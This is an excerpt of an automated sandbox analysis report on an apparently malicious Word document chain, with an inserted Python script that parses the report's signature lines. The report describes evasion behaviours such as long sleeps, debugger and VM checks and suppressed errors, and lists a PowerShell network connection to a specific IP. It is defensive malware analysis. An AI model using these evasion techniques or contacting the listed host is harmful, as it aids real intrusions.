Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540 | Thread sleep time: -922337203685477s >= -60s
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe TID: 3684 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 3736 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe TID: 3804 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 3864 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 4008 | Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\helphome.exe TID: 4016 | Thread sleep time: -5000s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 2540 | Thread sleep time: -120000s >= -60s
Queries disk information (often used to detect virtual machines)
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | File opened: PhysicalDrive0
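The signature lines in this report are awkward to triage by eye: the HTML extraction glued the Source cell to the action cell, the same entry is repeated dozens of times, and the delay values appear in two notations. The following Python is an added example, not part of the Joe Sandbox report or of Joe Sandbox tooling. It parses lines of this shape into records, collapses repeats into counts, and flags delay values that stall an analysis. Assumptions: the action labels are the ones visible in this report; INFINITE_DELAY is my reading of 922337203685477 as Int64.MaxValue in 100 ns ticks converted to milliseconds; the threshold in flag_delays is applied to the printed magnitude as-is, because the report's "s" suffix does not say what unit the raw value is in. The sample lines are copied from the report above.

```python
"""Added example, not part of the Joe Sandbox report: parse the flattened
"Source: <process><action>: <detail>" signature lines into records, collapse
repeats, and flag delay values that stall a sandbox."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Action labels used in the behaviour tables of this report (assumption: the
# list is taken from the lines visible above). The extraction glued the Source
# cell to the action cell (".EXEProcess queried"), so the action label is the
# only reliable boundary between process path and detail.
ACTIONS = (
    "Process queried", "Process token adjusted", "Process information queried",
    "Process information set", "File Volume queried", "File opened",
    "Thread delayed", "Thread sleep time", "Key value queried",
    "Queries volume information", "Network Connect",
)
_LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)(?:\s+TID:\s*(?P<tid>\d+))?\s*"
    r"(?P<action>" + "|".join(re.escape(a) for a in ACTIONS) + r"):\s*(?P<detail>.*?)\s*$"
)
# Assumption: Int64.MaxValue in 100 ns ticks, converted to milliseconds. This is
# the value the report prints for powershell.exe, i.e. an effectively infinite wait.
INFINITE_DELAY = (2**63 - 1) // 10_000


@dataclass(frozen=True)
class Record:
    process: str          # image name only, e.g. "powershell.exe"
    tid: Optional[int]    # thread id when the line carries one
    action: str
    detail: str


def parse_line(line: str) -> Optional[Record]:
    """Return a Record for a signature line, or None for headings and blanks."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    image = m.group("proc").rsplit("\\", 1)[-1]
    tid = int(m.group("tid")) if m.group("tid") else None
    return Record(image, tid, m.group("action"), m.group("detail"))


def parse_report(text: str) -> list:
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def collapse(records) -> Counter:
    """Count identical (process, action, detail) triples, so that 92 repeated
    DebugPort lines become one entry with a count."""
    return Counter((r.process, r.action, r.detail) for r in records)


def delay_value(r: Record) -> Optional[int]:
    """Magnitude of the first signed integer in a delay/sleep detail."""
    if r.action not in ("Thread delayed", "Thread sleep time"):
        return None
    m = re.search(r"-?\d+", r.detail)
    return abs(int(m.group())) if m else None


def flag_delays(records, threshold: int = 60_000) -> list:
    """Return (process, tid, value, verdict) for delays worth a second look.
    The threshold is compared against the printed magnitude as-is (assumption:
    the caller knows the unit the report is using)."""
    flagged = []
    for r in records:
        v = delay_value(r)
        if v is None:
            continue
        if v >= INFINITE_DELAY:
            flagged.append((r.process, r.tid, v, "infinite"))
        elif v >= threshold:
            flagged.append((r.process, r.tid, v, "long"))
    return flagged


# Sample input: lines copied from the report above, in their flattened form.
SAMPLE = """\
Source: C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXEProcess queried: DebugPort
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeProcess token adjusted: Debug
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 3576Thread sleep time: -120000s >= -60s
Source: C:\\Windows\\System32\\helphome.exe TID: 4008Thread sleep time: -500s >= -60s
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeNetwork Connect: 209.59.172.114 80
Queries a list of all running processes
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for key, n in collapse(recs).items():
        print(n, *key)
    print(flag_delays(recs))
```

Run as a script it prints the collapsed table and the two flagged powershell.exe delays; pass the full report text to parse_report to triage a whole page of signatures the same way.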

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (52 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (82 identical entries)
Source: C:\Users\user~1\AppData\Local\Temp\16994.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\helphome.exe | Process information set: NOOPENFILEERRORBOX (10 identical entries)
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 209.59.172.114 80

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
[Behavior graph rendered as an image; node labels recovered below, graph layout not reproduced.]
Behavior Graph ID: 389575. Startdate: 17/10/2017. Architecture: WINDOWS. Score: 100.
Processes started from the sample: wget.exe, WINWORD.EXE, helphome.exe (two instances); 2 further processes hidden because the level exceeded maximum capacity.
Signatures shown on the graph: Injects files into Windows application; Drops executables to the windows directory (C:\Windows) and starts them; Encrypted powershell cmdline option found; Detected TCP or UDP traffic on non-standard ports; System process connects to network (likely due to code injection or exploit). Further signatures hidden per level because the level exceeded maximum capacity.
Connected hosts: the graph's network nodes (domain, IP, port, ASN, country) are not reproduced here; 67 connected IPs were already hidden in the graph because the level exceeded maximum capacity.